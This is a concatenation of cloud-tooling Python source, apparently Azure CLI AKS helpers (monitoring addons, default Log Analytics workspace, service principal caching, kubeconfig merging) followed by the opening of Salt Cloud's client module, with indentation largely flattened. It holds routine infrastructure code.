addons.remove('http_application_routing')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
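# Illustrative example (hypothetical workspace resource id): enabling
# 'http_application_routing,monitoring' produces an addon_profiles dict roughly like:
#
#     {
#         'httpApplicationRouting': ManagedClusterAddonProfile(enabled=True),
#         'omsagent': ManagedClusterAddonProfile(
#             enabled=True,
#             config={'logAnalyticsWorkspaceResourceID':
#                     '/subscriptions/sub-0000/resourcegroups/rg/providers/'
#                     'microsoft.operationalinsights/workspaces/myws'})
#     }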
def _install_dev_spaces_extension(extension_name):
try:
from azure.cli.command_modules.extension import custom
custom.add_extension(extension_name=extension_name)
    except Exception:  # pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.command_modules.extension import custom
custom.update_extension(extension_name=extension_name)
# reloading the imported module to update
try:
from importlib import reload
except ImportError:
pass # for python 2
reload(sys.modules[extension_module])
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureLocationToOmsRegionCodeMap = {
"eastus": "EUS",
"westeurope": "WEU",
"southeastasia": "SEA",
"australiasoutheast": "ASE",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"japaneast": "EJP",
"uksouth": "SUK",
"canadacentral": "CCA",
"centralindia": "CIN",
"eastus2euap": "EAP"
}
AzureRegionToOmsRegionMap = {
"australiaeast": "australiasoutheast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "eastus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "eastus",
"eastasia": "southeastasia",
"eastus": "eastus",
"eastus2": "eastus",
"japaneast": "japaneast",
"japanwest": "japaneast",
"northcentralus": "eastus",
"northeurope": "westeurope",
"southcentralus": "eastus",
"southeastasia": "southeastasia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westus": "eastus",
"westus2": "eastus",
"centralindia": "centralindia",
"southindia": "centralindia",
"westindia": "centralindia",
"koreacentral": "southeastasia",
"koreasouth": "southeastasia",
"francecentral": "westeurope",
"francesouth": "westeurope"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
default_region_name = "eastus"
default_region_code = "EUS"
    workspace_region = AzureRegionToOmsRegionMap.get(rg_location, default_region_name)
    workspace_region_code = AzureLocationToOmsRegionCodeMap.get(workspace_region, default_region_code)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
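# Illustrative example (made-up subscription id): for a resource group located in 'westus2'
# the maps above resolve to workspace_region 'eastus' and region code 'EUS', so the default
# workspace that is created or reused is roughly:
#
#     resource group: 'DefaultResourceGroup-EUS'
#     workspace name: 'DefaultWorkspace-sub-0000-EUS'
#     resource id:    '/subscriptions/sub-0000/resourceGroups/DefaultResourceGroup-EUS'
#                     '/providers/Microsoft.OperationalInsights/workspaces/DefaultWorkspace-sub-0000-EUS'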
def _ensure_container_insights_for_monitoring(cmd, addon):
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None,
purge_sp_cache=False):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
try:
obj_id = _resolve_service_principal(rbac_client.service_principals, service_principal)
rbac_client.service_principals.get(obj_id)
except GraphErrorException as ex:
logger.warning(ex)
if ex.response.status_code == 404:
logger.warning('Cached service principal doesn\'t exist, creating a new one')
service_principal = None
client_secret = None
else:
raise ex
except CLIError as ex:
                if 'doesn\'t exist' in str(ex):
logger.warning('Cached service principal doesn\'t exist, creating a new one')
service_principal = None
client_secret = None
else:
raise ex
if not service_principal or purge_sp_cache:
# Nothing to load, make one.
if not client_secret or purge_sp_cache:
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8')
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior: these fields are not sent
    by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"centralus",
"eastus",
"eastus2",
"westus",
"westus2",
"northeurope",
"westeurope",
"southeastasia",
"australiaeast"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
The top level interface used to translate configuration data back to the
correct cloud modules
"""
# Import python libs
from __future__ import absolute_import, generators, print_function, unicode_literals
import copy
import glob
import logging
import multiprocessing
import os
import signal
import sys
import time
import traceback
from itertools import groupby
import salt.client
# Import salt libs
import salt.config
import salt.loader
import salt.syspaths
import salt.utils.args
import salt.utils.cloud
import salt.utils.context
import salt.utils.crypt
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.files
import salt.utils.user
import salt.utils.verify
import salt.utils.yaml
# Import salt.cloud libs
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudException,
SaltCloudNotFound,
SaltCloudSystemExit,
)
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
# Import third party libs
try:
import Cryptodome.Random
except ImportError:
try:
import Crypto.Random
except ImportError:
pass # pycrypto < 2.1
# Get logging started
log = logging.getLogger(__name__)
def communicator(func):
"""Warning, this is a picklable decorator !"""
def _call(queue, args, kwargs):
"""called with [queue, args, kwargs] as first optional arg"""
kwargs["queue"] = queue
ret = None
try:
ret = func(*args, **kwargs)
queue.put("END")
except KeyboardInterrupt as ex:
trace = traceback.format_exc()
queue.put("KEYBOARDINT")
queue.put("Keyboard interrupt")
queue.put("{0}\n{1}\n".format(ex, trace))
except Exception as ex: # pylint: disable=broad-except
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("Exception")
queue.put("{0}\n{1}\n".format(ex, trace))
except SystemExit as ex:
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("System exit")
queue.put("{0}\n{1}\n".format(ex, trace))
return ret
return _call
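# Rough usage sketch (not part of the original module; '_work' and the literal values are
# invented): the wrapped callable expects (queue, args, kwargs) and reports completion
# through the queue.
#
#     @communicator
#     def _work(x, queue=None):
#         return x + 1
#
#     q = multiprocessing.Manager().Queue()
#     _work(q, [41], {})   # runs _work(41, queue=q) and puts "END" on success
#     q.get()              # -> "END" ("KEYBOARDINT"/"ERROR" plus details on failure)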
def enter_mainloop(
target,
mapped_args=None,
args=None,
kwargs=None,
pool=None,
pool_size=None,
callback=None,
queue=None,
):
"""
Manage a multiprocessing pool
- If the queue does not output anything, the pool runs indefinitely
    - If the queue returns KEYBOARDINT or ERROR, this will kill the pool
      by calling terminate & join, and ends with a SaltCloudSystemExit
      exception notifying callers of the abnormal termination
    - If the queue returns END, or callback is defined and returns True,
      it just joins the process and returns the data.
    target
        the function you want to execute in multiprocessing
    pool
        a pool object; can be None if you want a default pool, but then
        you'll have to define pool_size instead
    pool_size
        pool size if you did not provide a pool yourself
    callback
        a callable taking a string argument which returns True to
        signal that 'target' is finished and we need to join
        the pool
queue
A custom multiprocessing queue in case you want to do
extra stuff and need it later in your program
args
positional arguments to call the function with
if you don't want to use pool.map
mapped_args
        a list of one or more argument combinations to call the function with
e.g. (foo, [[1], [2]]) will call::
foo([1])
foo([2])
kwargs
        keyword arguments to pass to the function when it runs in a worker process
Attention, the function must have the following signature:
target(queue, *args, **kw)
You may use the 'communicator' decorator to generate such a function
(see end of this file)
"""
if not kwargs:
kwargs = {}
if not pool_size:
pool_size = 1
if not pool:
pool = multiprocessing.Pool(pool_size)
if not queue:
manager = multiprocessing.Manager()
queue = manager.Queue()
if mapped_args is not None and not mapped_args:
        msg = (
            "We are called to asynchronously execute {0}"
            " but we do not have anything to execute, weird,"
            " we bail out".format(target)
        )
log.error(msg)
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif mapped_args is not None:
iterable = [[queue, [arg], kwargs] for arg in mapped_args]
ret = pool.map(func=target, iterable=iterable)
else:
ret = pool.apply(target, [queue, args, kwargs])
while True:
test = queue.get()
if test in ["ERROR", "KEYBOARDINT"]:
type_ = queue.get()
trace = queue.get()
msg = "Caught {0}, terminating workers\n".format(type_)
msg += "TRACE: {0}\n".format(trace)
log.error(msg)
pool.terminate()
pool.join()
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif test in ["END"] or (callback and callback(test)):
pool.close()
pool.join()
break
else:
time.sleep(0.125)
return ret
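# Hedged usage sketch (assuming the '_work' example sketched above communicator and a single
# worker): the plain 'args' path calls target(queue, args, kwargs) via pool.apply and waits
# for the "END" marker before returning.
#
#     result = enter_mainloop(_work, args=[41], pool_size=1)
#     # result == 42 once the queue reports "END"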
class CloudClient(object):
"""
The client class to wrap cloud interactions
"""
def __init__(self, path=None, opts=None, config_dir=None, pillars=None):
if opts:
self.opts = opts
else:
self.opts = salt.config.cloud_config(path)
# Check the cache-dir exists. If not, create it.
v_dirs = [self.opts["cachedir"]]
salt.utils.verify.verify_env(v_dirs, salt.utils.user.get_user())
if pillars:
for name, provider in six.iteritems(pillars.pop("providers", {})):
driver = provider["driver"]
provider["profiles"] = {}
self.opts["providers"].update({name: {driver: provider}})
for name, profile in six.iteritems(pillars.pop("profiles", {})):
provider = profile["provider"].split(":")[0]
driver = next(six.iterkeys(self.opts["providers"][provider]))
profile["provider"] = "{0}:{1}".format(provider, driver)
profile["profile"] = name
self.opts["profiles"].update({name: profile})
self.opts["providers"][provider][driver]["profiles"].update(
{name: profile}
)
for name, map_dct in six.iteritems(pillars.pop("maps", {})):
if "maps" not in self.opts:
self.opts["maps"] = {}
self.opts["maps"][name] = map_dct
self.opts.update(pillars)
def _opts_defaults(self, **kwargs):
"""
Set the opts dict to defaults and allow for opts to be overridden in
the kwargs
"""
# Let's start with the default salt cloud configuration
opts = salt.config.DEFAULT_CLOUD_OPTS.copy()
# Update it with the loaded configuration
opts.update(self.opts.copy())
# Reset some of the settings to sane values
opts["parallel"] = False
opts["keep_tmp"] = False
opts["deploy"] = True
opts["update_bootstrap"] = False
opts["show_deploy_args"] = False
opts["script_args"] = ""
# Update it with the passed kwargs
if "kwargs" in kwargs:
opts.update(kwargs["kwargs"])
opts.update(kwargs)
profile = opts.get("profile", None)
# filter other profiles if one is specified
if profile:
tmp_profiles = opts.get("profiles", {}).copy()
for _profile in [a for a in tmp_profiles]:
if not _profile == profile:
tmp_profiles.pop(_profile)
# if profile is specified and we have enough info about providers
            # also filter them to speed up methods like
# __filter_non_working_providers
providers = [
a.get("provider", "").split(":")[0]
for a in six.itervalues(tmp_profiles)
if a.get("provider", "")
]
if providers:
_providers = opts.get("providers", {})
for provider in _providers.copy():
if provider not in providers:
_providers.pop(provider)
return opts
def low(self, fun, low):
"""
Pass the cloud function and low data structure to run
"""
l_fun = getattr(self, fun)
f_call = salt.utils.args.format_call(l_fun, low)
return l_fun(*f_call.get("args", ()), **f_call.get("kwargs", {}))
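    # Illustrative sketch (invented profile/minion names): low() simply dispatches to another
    # method on this client via salt.utils.args.format_call, e.g.
    #
    #     client = CloudClient('/etc/salt/cloud')
    #     client.low('profile', {'profile': 'do_512_git', 'names': ['minion01']})
    #     # roughly equivalent to client.profile('do_512_git', ['minion01'])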
def list_sizes(self, provider=None):
"""
List all available sizes in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.size_list(provider))
def list_images(self, provider=None):
"""
List all available images in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.image_list(provider))
def list_locations(self, provider=None):
"""
List all available locations in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.location_list(provider))
def query(self, query_type="list_nodes"):
"""
Query basic instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes"
return mapper.map_providers_parallel(query_type)
def full_query(self, query_type="list_nodes_full"):
"""
Query all instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_full"
return mapper.map_providers_parallel(query_type)
def select_query(self, query_type="list_nodes_select"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_select"
return mapper.map_providers_parallel(query_type)
def min_query(self, query_type="list_nodes_min"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_min"
return mapper.map_providers_parallel(query_type)
def profile(self, profile, names, vm_overrides=None, **kwargs):
"""
Pass in a profile to create, names is a list of vm names to allocate
vm_overrides is a special dict that will be per node options
overrides
Example:
.. code-block:: python
>>> client= salt.cloud.CloudClient(path='/etc/salt/cloud')
>>> client.profile('do_512_git', names=['minion01',])
{'minion01': {'backups_active': 'False',
'created_at': '2014-09-04T18:10:15Z',
'droplet': {'event_id': 31000502,
'id': 2530006,
'image_id': 5140006,
'name': 'minion01',
'size_id': 66},
'id': '2530006',
'image_id': '5140006',
'ip_address': '107.XXX.XXX.XXX',
'locked': 'True',
'name': 'minion01',
'private_ip_address': None,
'region_id': '4',
'size_id': '66',
'status': 'new'}}
"""
if not vm_overrides:
vm_overrides = {}
kwargs["profile"] = profile
mapper = salt.cloud.Map(self._opts_defaults(**kwargs))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(
mapper.run_profile(profile, names, vm_overrides=vm_overrides)
)
def map_run(self, path=None, **kwargs):
"""
To execute a map
"""
kwarg = {}
if path:
kwarg["map"] = path
kwarg.update(kwargs)
mapper = salt.cloud.Map(self._opts_defaults(**kwarg))
dmap = mapper.map_data()
return salt.utils.data.simple_types_filter(mapper.run_map(dmap))
def destroy(self, names):
"""
Destroy the named VMs
"""
mapper = salt.cloud.Map(self._opts_defaults(destroy=True))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(mapper.destroy(names))
def create(self, provider, names, **kwargs):
"""
Create the named VMs, without using a profile
Example:
.. code-block:: python
client.create(provider='my-ec2-config', names=['myinstance'],
image='ami-1624987f', size='t1.micro', ssh_username='ec2-user',
securitygroup='default', delvol_on_destroy=True)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = self.opts["providers"]
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
vm_ = kwargs.copy()
vm_["name"] = name
vm_["driver"] = provider
# This function doesn't require a profile, but many cloud drivers
# check for profile information (which includes the provider key) to
# help with config file debugging and setting up instances. Setting
# the profile and provider defaults here avoids errors in other
# cloud functions relying on these keys. See SaltStack Issue #41971
# and PR #38166 for more information.
vm_["profile"] = None
vm_["provider"] = provider
ret[name] = salt.utils.data.simple_types_filter(mapper.create(vm_))
return ret
def extra_action(self, names, provider, action, **kwargs):
"""
Perform actions with block storage devices
Example:
.. code-block:: python
client.extra_action(names=['myblock'], action='volume_create',
provider='my-nova', kwargs={'voltype': 'SSD', 'size': 1000}
)
client.extra_action(names=['salt-net'], action='network_create',
provider='my-nova', kwargs={'cidr': '192.168.100.0/24'}
)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = mapper.map_providers_parallel()
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
extra_ = kwargs.copy()
extra_["name"] = name
extra_["provider"] = provider
extra_["profile"] = None
extra_["action"] = action
ret[name] = salt.utils.data.simple_types_filter(mapper.extras(extra_))
return ret
def action(
self,
fun=None,
cloudmap=None,
names=None,
provider=None,
instance=None,
kwargs=None,
):
"""
Execute a single action via the cloud plugin backend
Examples:
.. code-block:: python
client.action(fun='show_instance', names=['myinstance'])
client.action(fun='show_image', provider='my-ec2-config',
kwargs={'image': 'ami-10314d79'}
)
"""
if kwargs is None:
kwargs = {}
mapper = salt.cloud.Map(self._opts_defaults(action=fun, names=names, **kwargs))
if instance:
if names:
raise SaltCloudConfigError(
"Please specify either a list of 'names' or a single "
"'instance', but not both."
)
names = [instance]
if names and not provider:
self.opts["action"] = fun
return mapper.do_action(names, kwargs)
if provider and not names:
return mapper.do_function(provider, fun, kwargs)
else:
# This should not be called without either an instance or a
# provider. If both an instance/list of names and a provider
# are given, then we also need to exit. We can only have one
# or the other.
raise SaltCloudConfigError(
"Either an instance (or list of names) or a provider must be "
"specified, but not both."
)
class Cloud(object):
"""
An object for the creation of new VMs
"""
def __init__(self, opts):
self.opts = opts
self.clouds = salt.loader.clouds(self.opts)
self.__filter_non_working_providers()
self.__cached_provider_queries = {}
def get_configured_providers(self):
"""
Return the configured providers
"""
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
if len(drivers) > 1:
for driver in drivers:
providers.add("{0}:{1}".format(alias, driver))
continue
providers.add(alias)
return providers
def lookup_providers(self, lookup):
"""
Get a dict describing the configured providers
"""
if lookup is None:
lookup = "all"
if lookup == "all":
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit("There are no cloud providers configured.")
return providers
if ":" in lookup:
alias, driver = lookup.split(":")
if (
alias not in self.opts["providers"]
or driver not in self.opts["providers"][alias]
):
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. Available: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
if lookup in (alias, driver):
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. "
"Available selections: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
return providers
def lookup_profiles(self, provider, lookup):
"""
Return a dictionary describing the configured profiles
"""
if provider is None:
provider = "all"
if lookup is None:
lookup = "all"
if lookup == "all":
profiles = set()
provider_profiles = set()
for alias, info in six.iteritems(self.opts["profiles"]):
providers = info.get("provider")
if providers:
given_prov_name = providers.split(":")[0]
salt_prov_name = providers.split(":")[1]
if given_prov_name == provider:
provider_profiles.add((alias, given_prov_name))
elif salt_prov_name == provider:
provider_profiles.add((alias, salt_prov_name))
profiles.add((alias, given_prov_name))
if not profiles:
raise SaltCloudSystemExit("There are no cloud profiles configured.")
if provider != "all":
return provider_profiles
return profiles
def map_providers(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
pmap = {}
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver, details in six.iteritems(drivers):
fun = "{0}.{1}".format(driver, query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
if alias not in pmap:
pmap[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
pmap[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for "
"running nodes: %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any
# nodes
pmap[alias][driver] = []
self.__cached_provider_queries[query] = pmap
return pmap
def map_providers_parallel(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
Same as map_providers but query in parallel.
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
opts = self.opts.copy()
multiprocessing_data = []
# Optimize Providers
opts["providers"] = self._optimize_providers(opts["providers"])
for alias, drivers in six.iteritems(opts["providers"]):
            # Make a temp query for this driver to avoid overwriting the next one
this_query = query
for driver, details in six.iteritems(drivers):
                # If the driver provides list_nodes_min, use it instead of the
                # requested query to check the existing VMs on this driver with
                # minimal information. Otherwise, keep using the query param.
if (
opts.get("selected_query_option") is None
and "{0}.list_nodes_min".format(driver) in self.clouds
):
this_query = "list_nodes_min"
fun = "{0}.{1}".format(driver, this_query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
multiprocessing_data.append(
{
"fun": fun,
"opts": opts,
"query": this_query,
"alias": alias,
"driver": driver,
}
)
output = {}
if not multiprocessing_data:
return output
data_count = len(multiprocessing_data)
        pool = multiprocessing.Pool(min(data_count, 10), init_pool_worker)
parallel_pmap = enter_mainloop(
_run_parallel_map_providers_query, multiprocessing_data, pool=pool
)
for alias, driver, details in parallel_pmap:
if not details:
# There's no providers details?! Skip it!
continue
if alias not in output:
output[alias] = {}
output[alias][driver] = details
self.__cached_provider_queries[query] = output
return output
def get_running_by_names(
